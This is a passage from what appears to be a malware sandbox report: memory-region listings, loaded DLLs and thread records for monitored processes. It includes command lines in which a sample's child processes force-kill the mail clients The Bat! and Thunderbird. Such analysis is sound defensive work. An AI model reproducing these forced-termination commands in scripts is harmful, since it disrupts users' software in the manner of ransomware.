end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3147 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3148 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3149 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3150 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 253 os_tid = 0xc88 Thread: id = 273 os_tid = 0xd24 Thread: id = 282 os_tid = 0xd68 Thread: id = 292 os_tid = 0xd90 Thread: id = 293 os_tid = 0xd94 Process: id = "37" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x24a3b000" os_pid = "0xca0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thebat64.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2881 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2882 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2883 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2884 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2885 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2886 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2887 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2888 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2889 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2890 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2891 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2892 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2893 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2894 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2895 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3151 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3152 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3153 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3154 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3155 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3156 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3157 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3158 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3159 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3160 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3161 start_va = 0x2f0000 end_va = 0x3affff entry_point = 0x2f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3162 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3163 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3164 start_va = 0x4d0000 end_va = 0x657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3165 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3166 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3167 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 3168 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3169 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 3170 start_va = 0x1e50000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3171 start_va = 0x1ed0000 end_va = 0x219efff entry_point = 0x1ed0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3172 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 3173 start_va = 0x23f0000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 3174 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3175 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3176 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3177 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3178 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3179 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3180 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3181 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3182 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3183 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3184 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3185 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3186 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3187 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3188 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3189 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3190 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3191 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3192 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3193 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3194 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3195 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3196 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3197 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3198 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3199 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3200 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3201 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3202 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3203 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3204 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3205 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3206 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3207 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3208 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3209 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3210 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3211 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3212 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3213 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 257 os_tid = 0xca4 Thread: id = 279 os_tid = 0xd54 Thread: id = 290 os_tid = 0xd88 Thread: id = 294 os_tid = 0xd98 Thread: id = 295 os_tid = 0xd9c Process: id = "38" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1f55a000" os_pid = "0xccc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thunderbird.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2896 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2897 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2898 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2899 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2900 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2901 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2902 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2903 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2904 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2905 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2906 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2907 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2908 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2909 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2910 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3375 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3376 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3377 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3378 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3379 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3380 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3381 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3382 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3383 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3384 start_va = 0x320000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3385 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 3386 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3387 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3388 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3389 start_va = 0x1bf0000 end_va = 0x1caffff entry_point = 0x1bf0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3390 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3391 start_va = 0x1dc0000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 3392 start_va = 0x1e40000 end_va = 0x210efff entry_point = 0x1e40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3393 start_va = 0x2190000 end_va = 0x220ffff entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 3394 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 3395 start_va = 0x2390000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 3396 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3397 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3398 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3399 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3400 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3401 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3402 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3403 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3404 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3405 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3406 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3407 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3408 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3409 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3410 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3411 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3412 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3413 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3414 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3415 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3416 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3417 start_va = 0x7fefdb10000 end_va = 